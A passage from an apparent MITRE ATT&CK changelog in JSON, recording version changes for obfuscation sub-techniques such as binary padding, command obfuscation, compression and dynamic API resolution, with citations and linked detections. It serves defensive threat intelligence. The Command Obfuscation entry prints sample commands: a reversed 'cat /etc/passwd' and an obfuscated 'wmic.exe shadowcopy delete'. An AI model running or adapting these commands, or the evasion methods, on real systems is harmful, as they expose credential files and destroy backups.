nowrap=\"nowrap\">otected&nbsp;compressed/encrypted&nbsp;file&nbsp;that&nbsp;was&nbsp;provided&nbsp;by&nbsp;the&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">otected&nbsp;compressed/encrypted&nbsp;file&nbsp;that&nbsp;was&nbsp;provided&nbsp;by&nbsp;the&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dversary.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Volexity&nbsp;PowerDuke&nbsp;November&nbsp;2016)&nbsp;Adver</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dversary.(Citation:&nbsp;Volexity&nbsp;PowerDuke&nbsp;November&nbsp;2016)&nbsp;Advers</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">saries&nbsp;may&nbsp;also&nbsp;use&nbsp;compressed&nbsp;or&nbsp;archived&nbsp;scripts,&nbsp;such&nbsp;as&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">aries&nbsp;may&nbsp;also&nbsp;use&nbsp;compressed&nbsp;or&nbsp;archived&nbsp;scripts,&nbsp;such&nbsp;as&nbsp;J</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">JavaScript.&nbsp;&nbsp;&nbsp;Portions&nbsp;of&nbsp;files&nbsp;can&nbsp;also&nbsp;be&nbsp;encoded&nbsp;to&nbsp;hide&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">avaScript.&nbsp;&nbsp;&nbsp;Portions&nbsp;of&nbsp;files&nbsp;can&nbsp;also&nbsp;be&nbsp;encoded&nbsp;to&nbsp;hide&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">the&nbsp;plain-text&nbsp;strings&nbsp;that&nbsp;would&nbsp;otherwise&nbsp;help&nbsp;defenders&nbsp;w</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;plain-text&nbsp;strings&nbsp;that&nbsp;would&nbsp;otherwise&nbsp;help&nbsp;defenders&nbsp;wi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ith&nbsp;discovery.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Linux/Cdorked.A&nbsp;We&nbsp;Live&nbsp;Security&nbsp;A</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">th&nbsp;discovery.(Citation:&nbsp;Linux/Cdorked.A&nbsp;We&nbsp;Live&nbsp;Security&nbsp;Ana</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nalysis)&nbsp;Payloads&nbsp;may&nbsp;also&nbsp;be&nbsp;split&nbsp;into&nbsp;separate,&nbsp;seemingly</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lysis)&nbsp;Payloads&nbsp;may&nbsp;also&nbsp;be&nbsp;split&nbsp;into&nbsp;separate,&nbsp;seemingly&nbsp;b</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;benign&nbsp;files&nbsp;that&nbsp;only&nbsp;reveal&nbsp;malicious&nbsp;functionality&nbsp;when&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">enign&nbsp;files&nbsp;that&nbsp;only&nbsp;reveal&nbsp;malicious&nbsp;functionality&nbsp;when&nbsp;re</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">reassembled.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Carbon&nbsp;Black&nbsp;Obfuscation&nbsp;Sept&nbsp;2016)&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">assembled.(Citation:&nbsp;Carbon&nbsp;Black&nbsp;Obfuscation&nbsp;Sept&nbsp;2016)&nbsp;&nbsp;Ad</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;abuse&nbsp;[Command&nbsp;Obfuscation](https://at</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">versaries&nbsp;may&nbsp;also&nbsp;abuse&nbsp;[Command&nbsp;Obfuscation](https://attac</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tack.mitre.org/techniques/T1027/010)&nbsp;to&nbsp;obscure&nbsp;commands&nbsp;exe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k.mitre.org/techniques/T1027/010)&nbsp;to&nbsp;obscure&nbsp;commands&nbsp;execut</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cuted&nbsp;from&nbsp;payloads&nbsp;or&nbsp;directly&nbsp;via&nbsp;[Command&nbsp;and&nbsp;Scripting&nbsp;I</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;from&nbsp;payloads&nbsp;or&nbsp;directly&nbsp;via&nbsp;[Command&nbsp;and&nbsp;Scripting&nbsp;Inte</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nterpreter](https://attack.mitre.org/techniques/T1059).&nbsp;Envi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rpreter](https://attack.mitre.org/techniques/T1059).&nbsp;Environ</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ronment&nbsp;variables,&nbsp;aliases,&nbsp;characters,&nbsp;and&nbsp;other&nbsp;platform/l</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ment&nbsp;variables,&nbsp;aliases,&nbsp;characters,&nbsp;and&nbsp;other&nbsp;platform/lang</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">anguage&nbsp;specific&nbsp;semantics&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;evade&nbsp;signature&nbsp;ba</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uage&nbsp;specific&nbsp;semantics&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;evade&nbsp;signature&nbsp;based</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sed&nbsp;detections&nbsp;and&nbsp;application&nbsp;control&nbsp;mechanisms.<span class=\"diff_sub\">&nbsp;</span>(Citation</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;detections&nbsp;and&nbsp;application&nbsp;control&nbsp;mechanisms.(Citation:&nbsp;Fi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">:&nbsp;FireEye&nbsp;Obfuscation&nbsp;June<span class=\"diff_sub\">&nbsp;2017)&nbsp;(Citation:&nbsp;FireEye&nbsp;Revoke-O</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">reEye&nbsp;Obfuscation&nbsp;June&nbsp;2017)(Citation:&nbsp;<span class=\"diff_chg\">Fire</span>E<span class=\"diff_chg\">ye&nbsp;Revoke-Obfusc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">bfuscation&nbsp;July</span>&nbsp;2017)(Citation:&nbsp;<span class=\"diff_chg\">PaloAlto&nbsp;</span>E<span class=\"diff_chg\">ncodedCommand&nbsp;Marc</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">ation&nbsp;July</span>&nbsp;2017)<span class=\"diff_chg\">(Citation:&nbsp;PaloAlto&nbsp;EncodedCommand&nbsp;March&nbsp;201</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">h</span>&nbsp;2017)<span class=\"diff_chg\">&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">7)&nbsp;</span></td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training",
                            "M1040: Behavior Prevention on Endpoint",
                            "M1047: Audit",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0378: Behavioral Detection of Obfuscated Files or Information"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-05 14:04:25.865000+00:00",
                    "modified": "2026-04-15 22:15:33.904000+00:00",
                    "name": "Binary Padding",
                    "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/001",
                            "external_id": "T1027.001"
                        },
                        {
                            "source_name": "ESET OceanLotus",
                            "description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
                            "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
                        },
                        {
                            "source_name": "Securelist Malware Tricks April 2017",
                            "description": "Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.",
                            "url": "https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/"
                        },
                        {
                            "source_name": "VirusTotal FAQ",
                            "description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.",
                            "url": "https://www.virustotal.com/en/faq/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Martin Jirkal, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:15:33.904000+00:00\", \"old_value\": \"2025-10-24 17:48:50.205000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0553: Detection Strategy for Obfuscated Files or Information: Binary Padding"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-14 17:36:01.022000+00:00",
                    "modified": "2026-04-15 22:16:39.249000+00:00",
                    "name": "Command Obfuscation",
                    "description": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing,  `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`\u201cWor\u201d+\u201cd.Application\u201d`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)\n\nTools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/010",
                            "external_id": "T1027.010"
                        },
                        {
                            "source_name": "Twitter Richard WMIC",
                            "description": "Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12, 2024.",
                            "url": "https://x.com/rfackroyd/status/1639136000755765254"
                        },
                        {
                            "source_name": "Invoke-Obfuscation",
                            "description": "Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved March 17, 2023.",
                            "url": "https://github.com/danielbohannon/Invoke-Obfuscation"
                        },
                        {
                            "source_name": "Invoke-DOSfuscation",
                            "description": "Bohannon, D. (2018, March 19). Invoke-DOSfuscation. Retrieved March 17, 2023.",
                            "url": "https://github.com/danielbohannon/Invoke-DOSfuscation"
                        },
                        {
                            "source_name": "FireEye Obfuscation June 2017",
                            "description": "Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.",
                            "url": "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html"
                        },
                        {
                            "source_name": "Malware Monday VBE",
                            "description": "Bromiley, M. (2016, December 27). Malware Monday: VBScript and VBE Files. Retrieved March 17, 2023.",
                            "url": "https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16"
                        },
                        {
                            "source_name": "Akamai JS",
                            "description": "Katz, O. (2020, October 26). Catch Me if You Can\u2014JavaScript Obfuscation. Retrieved March 17, 2023.",
                            "url": "https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation"
                        },
                        {
                            "source_name": "Bashfuscator Command Obfuscators",
                            "description": "LeFevre, A. (n.d.). Bashfuscator Command Obfuscators. Retrieved March 17, 2023.",
                            "url": "https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html"
                        },
                        {
                            "source_name": "Microsoft PowerShellB64",
                            "description": "Microsoft. (2023, February 8). about_PowerShell_exe: EncodedCommand. Retrieved March 17, 2023.",
                            "url": "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand"
                        },
                        {
                            "source_name": "RC PowerShell",
                            "description": "Red Canary. (n.d.). 2022 Threat Detection Report: PowerShell. Retrieved March 17, 2023.",
                            "url": "https://redcanary.com/threat-detection-report/techniques/powershell/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "George Thomas",
                        "Tim Peck",
                        "TruKno"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:16:39.249000+00:00\", \"old_value\": \"2025-04-15 22:06:13.992000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0505: Detection Strategy for Command Obfuscation"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-16 15:30:57.711000+00:00",
                    "modified": "2026-04-15 22:16:52.765000+00:00",
                    "name": "Compile After Delivery",
                    "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/004",
                            "external_id": "T1027.004"
                        },
                        {
                            "source_name": "ClearSky MuddyWater Nov 2018",
                            "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
                            "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf"
                        },
                        {
                            "source_name": "ATTACK IQ",
                            "description": "Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske. (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land Binaries. Retrieved July 15, 2024.",
                            "url": "https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/"
                        },
                        {
                            "source_name": "TrendMicro WindowsAppMac",
                            "description": "Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019.",
                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Liran Ravich, CardinalOps",
                        "Praetorian",
                        "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:16:52.765000+00:00\", \"old_value\": \"2025-10-24 17:49:22.358000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0501: Detection Strategy for Compile After Delivery - Source Code to Executable Transformation"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--fbd91bfc-75c2-4f0c-8116-3b4e722906b3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-03-04 18:29:33.850000+00:00",
                    "modified": "2026-04-15 22:16:53.338000+00:00",
                    "name": "Compression",
                    "description": "Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., [Fileless Storage](https://attack.mitre.org/techniques/T1027/011)).(Citation: Trustwave Pillowmint June 2020)\n\nIn order to further evade detection, adversaries may combine multiple ZIP files into one archive. This process of concatenation creates an archive that appears to be a single archive but in fact contains the central directories of the embedded archives. Some ZIP readers, such as 7zip, may not be able to identify concatenated ZIP files and miss the presence of the malicious payload.(Citation: Perception Point)\n\nFile archives may be sent as one [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) through email. Adversaries have sent malicious payloads as archived files to encourage the user to interact with and extract the malicious payload onto their system (i.e., [Malicious File](https://attack.mitre.org/techniques/T1204/002)).(Citation: NTT Security Flagpro new December 2021) However, some file compression tools, such as 7zip, can be used to produce self-extracting archives. Adversaries may send self-extracting archives to hide the functionality of their payload and launch it without requiring multiple actions from the user.(Citation: The Hacker News)\n\n[Compression](https://attack.mitre.org/techniques/T1027/015) may be used in combination with [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013) where compressed files are encrypted and password-protected.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/015",
                            "external_id": "T1027.015"
                        },
                        {
                            "source_name": "Perception Point",
                            "description": "Arthur Vaiselbuh, Peleg Cabra. (2024, November 7). Evasive ZIP Concatenation: Trojan Targets Windows Users. Retrieved March 3, 2025.",
                            "url": "https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/"
                        },
                        {
                            "source_name": "NTT Security Flagpro new December 2021",
                            "description": "Hada, H. (2021, December 28).  Flagpro The new malware used by BlackTech. Retrieved March 25, 2022.",
                            "url": "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech"
                        },
                        {
                            "source_name": "The Hacker News",
                            "description": "Ravie Lakshmanan. (2023, April 5). Hackers Using Self-Extracting Archives Exploit for Stealthy Backdoor Attacks. Retrieved March 3, 2025.",
                            "url": "https://thehackernews.com/2023/04/hackers-using-self-extracting-archives.html"
                        },
                        {
                            "source_name": "Trustwave Pillowmint June 2020",
                            "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020.",
                            "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Fernando Bacchin"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:16:53.338000+00:00\", \"old_value\": \"2025-04-15 19:59:24.125000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0281: Detection Strategy for Compressed Payload Creation and Execution"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-08-22 20:42:08.498000+00:00",
                    "modified": "2026-04-15 22:17:50.411000+00:00",
                    "name": "Dynamic API Resolution",
                    "description": "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.\n\nAPI functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)\n\nTo avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.\n\nVarious methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/007",
                            "external_id": "T1027.007"
                        },
                        {
                            "source_name": "Huntress API Hash",
